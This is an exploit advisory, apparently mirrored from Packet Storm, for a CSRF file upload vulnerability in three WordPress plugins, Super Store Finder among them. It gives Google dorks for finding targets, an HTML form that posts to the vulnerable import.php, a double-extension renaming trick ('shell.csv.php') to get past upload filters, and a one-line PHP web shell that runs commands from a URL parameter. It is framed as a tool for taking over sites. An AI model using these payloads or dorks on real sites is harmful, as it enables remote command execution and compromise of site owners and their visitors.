Share
## https://sploitus.com/exploit?id=PACKETSTORM:159627
###############################################################################################################################  
# Exploit Title : SuperStoreFinder Wordpress Plugins CSRF File Upload  
# Wordpress Plugins Affected : Super Store Finder | Super Interactive Maps  
| Super Logo Showcase  
# Exploit Type : Cross Site Request Forgery  
# Plugin URI: http://www.superstorefinder.net/  
# Version : All versions from 6.1 and below , show inside file ->  
"/wp-content/plugins/superstorefinder-wp/super-store-finder.php"  
# Plugin Author : Joe Iz  
# Tested On : Windows  
# Google Dork : allinurl:"/plugins/superstorefinder-wp/"  
# allinurl:"/plugins/super-interactive-maps/"  
# allinurl:"/plugins/superlogoshowcase-wp/"  
#  
# Date : 08/10/2020 , 11:11 PM  
# Exploit Author : Eagle Eye  
# Greets : United Muslims Cyber Army Members  
#  
# VULN PATH :  
wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/import.php  
#  
wp-content/plugins/superlogoshowcase-wp/sls-wp-admin/pages/import.php  
#  
wp-content/plugins/super-interactive-maps/sim-wp-admin/pages/import.php  
#  
###############################################################################################################################  
#  
# CSRF Code :  
#  
# <h1>Wordpress Plugins Super Store Finder Exploit</h1>  
# <br>  
# <form method="post"  
action="https://#webtarget#/wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/import.php"  
  
# enctype="multipart/form-data">  
# <input type="file" name="default_location" /> <input type="submit"  
value="Upload" />  
# </form>  
#  
# Uploaded Files :  
wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/SSF_WP_UPLOADS_PATH/csv/import/shell.csv.php  
# or  
# Uploaded Files :  
wp-content/plugins/superstorefinder-wp/ssf-wp-admin/shell.csv.php  
#  
wp-content/plugins/superlogoshowcase-wp/sls-wp-admin/shell.csv.php  
#  
wp-content/plugins/super-interactive-maps/sim-wp-admin/shell.csv.php  
#  
###############################################################################################################################  
# NOTES : *MOSTLY USING TAMPER DATA METHOD TO UPLOAD .PHP FILES*  
#  
# to upload shell , rename the shell to "shell.csv.php"  
# or using tamper data "shell.csv" -> "shell.csv.php"  
#  
# Bypassing some security if shell can't be uploaded (not for wordfence)  
# using simple php code inside the file we want to upload :  
#  
# <?php $str = $_GET['cmd']; system($str); ?>  
#  
# by using tamper data change to.csv.php extension and if successfully  
uploaded  
# just use rce method to upload your true shell  
#  
# Watch for more details :  
# https://www.youtube.com/watch?v=DQgmCYtUOhI&t=1s  
#  
###############################################################################################################################